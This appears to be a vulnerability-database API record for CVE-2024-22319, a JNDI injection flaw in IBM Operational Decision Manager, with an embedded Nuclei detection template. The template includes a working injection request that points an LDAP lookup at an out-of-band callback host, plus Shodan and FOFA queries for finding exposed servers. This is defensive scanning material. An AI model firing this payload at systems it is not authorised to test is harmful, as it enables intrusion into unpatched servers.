{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-22319/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-22319/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-22319/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-22319/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-22319/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-22319"},"sightings":{"href":"/api/v1/sightings/cve-2024-22319"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-22319.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-22319\n\ninfo:\n  name: IBM Operational Decision Manager - JNDI Injection\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API.  IBM X-Force ID:  279145.\n  impact: |\n    Unauthenticated attackers can execute arbitrary code via JNDI injection, potentially compromising the entire IBM ODM system.\n  remediation: |\n    Update IBM Operational Decision Manager to a version that addresses CVE-2024-22319.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-22319\n    cwe-id: CWE-74\n    epss-score: 0.764\n    epss-percentile: 0.99523\n    cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: ibm\n    product: operational_decision_manager\n    shodan-query:\n      - html:\"IBM ODM\"\n      - http.html:\"ibm odm\"\n    fofa-query:\n      - title=\"IBM ODM\"\n      - title=\"ibm odm\"\n      - body=\"ibm odm\"\n  tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(interactsh_protocol, \"dns\")\n          - 'contains(header, \"application/json\")'\n          - 'contains(body, \"patchLevel\\\":\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100ad7bb089ebe3ca1d1031553bd6027265067c896045bd92fed1a77eb8ec5b2a2c022100b3ab94a74e598388281e52f26fe9233306fca8245b48eec22a77d19497bec18c:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-22319"}